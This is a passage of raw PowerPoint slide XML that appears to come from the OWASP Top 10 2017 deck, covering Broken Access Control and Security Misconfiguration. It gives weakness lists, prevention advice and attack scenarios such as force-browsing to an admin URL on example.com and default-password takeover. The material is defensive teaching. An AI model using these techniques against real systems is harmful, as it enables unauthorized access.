                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</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An attacker simply force browses to target URLs. Admin rights are required for access to the admin page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</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If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>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rPr>
              <a:t>page, this is a flaw.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user. Common access control vulnerabilities include:</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Bypassing access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool.</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Allowing the primary key to be changed to another users record, permitting viewing or editing someone else's account.</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Elevation of privilege. Acting as a user without being logged in, or acting as an admin when logged in as a user.</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Metadata manipulation, such as replaying or tampering with a JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Token (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> access control token or a cookie or hidden field manipulated to elevate privileges, or abusing JWT invalidation</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CORS misconfiguration allows unauthorized API access.</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Force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user. Accessing API with missing access controls for POST, PUT and DELETE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans"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Proactive Controls: Access Controls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Application Security Verification Standard: V4 Access Control</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Testing Guide: Authorization Testing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Cheat Sheet: Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">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endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans"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CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</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CWE-284: Improper Access Control (Authorization)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CWE-285: Improper Authorization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CWE-639: Authorization Bypass Through User-Controlled Key</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>: Exploiting CORS Misconfiguration</a:t>
            </a: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ct val="90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Access control is only effective if enforced in trusted server-side code or server-less API, where the attacker cannot modify the access control check or metadata.</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With the exception of public resources, deny by default.</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Implement access control mechanisms once and re-use them throughout the application, including minimizing CORS usage.</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Model access controls should enforce record ownership, rather than accepting that the user can create, read, update, or delete any record.</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Unique application business limit requirements should be enforced by domain models.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Disable web server directory listing and ensure file metadata (e.g. .git) and backup files are not present within web roots.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Log access control failures, alert admins when appropriate (e.g. repeated failures).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Rate limit API and controller access to minimize the harm from automated attack tooling.</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JWT tokens should be invalidated on the server after logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90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Developers and QA staff should include functional access control unit and integration tests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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A5</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Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2969773518"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="223032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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: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Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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Exploitation of access control is a core skill of attackers. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> tools can detect the absence of access control but cannot verify if it is functional when it is present. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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n>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access control weaknesses are common due to the lack of automated detection, and lack of effective functional testing by application developers.</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900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access control detection is not typically amenable to automated static or dynamic testing. Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT, etc), controller, direct object references, etc.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="10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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The technical impact is attackers acting as users or administrators, or users using privileged functions, or creating, accessing, updating or deleting every record.</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900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of the application and data.</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911491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Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The application server comes with sample applications that are not removed from the production server. These sample applications have known security flaws attackers use to compromise the server. If one of these applications  is the admin console, and default accounts weren’t changed the attacker logs in with default passwords and takes over.</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Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Directory listing is not disabled on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> server. An attacker discovers they can simply list directories. The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. The attacker then finds a serious access control flaw in the application.</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Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The application server’s configuration allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de-tailed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>error messages, e.g. stack traces, to be returned to users. This potentially exposes sensitive information or underlying flaws such as component versions that are known to be vulnerable.</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Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A cloud service provider has default sharing permissions open to the Internet by other CSP users. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>allows sensitive data stored within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cloud storage to be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> accessed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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The application might be vulnerable if the application is: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Missing appropriate security hardening across any part of the application stack, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>improperly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> configured permissions on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cloud services.</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Unnecessary features are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges).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Default accounts and their passwords still enabled and unchanged.</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Error handling reveals stack traces or other overly informative error messages to users.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For upgraded systems, latest security features are disabled or not configured securely.</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security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values.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server does not send security headers or directives or they are not set to secure values.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software is out of date or vulnerable (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</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Without a concerted, repeatable application security configuration process, systems are at a higher risk.</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1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId5"/>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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes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8"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90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For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Security Verification Standard</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9"/>
              </a:rPr>
              <a:t>V19 Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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0"/>
              </a:rPr>
              <a:t>NIST Guide to General Server Hardening</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1"/>
              </a:rPr>
              <a:t>CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Environmental Security Flaws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2"/>
              </a:rPr>
              <a:t>CWE-16: Configuration</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CWE-388: Error Handling</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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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4"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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Amazon S3 Bucket Discovery and Enumeration</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pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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Secure installation processes should be implemented, including:</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 repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically, with different credentials used in each environment. This process should be automated to minimize the effort required to setup a new secure environment.</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 minimal platform without any unnecessary features, components, documentation, and samples. Remove or do not install unused features and frameworks.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 task to review and update the configurations appropriate to all security notes, updates and patches as part of the patch management process (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). In particular, review </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
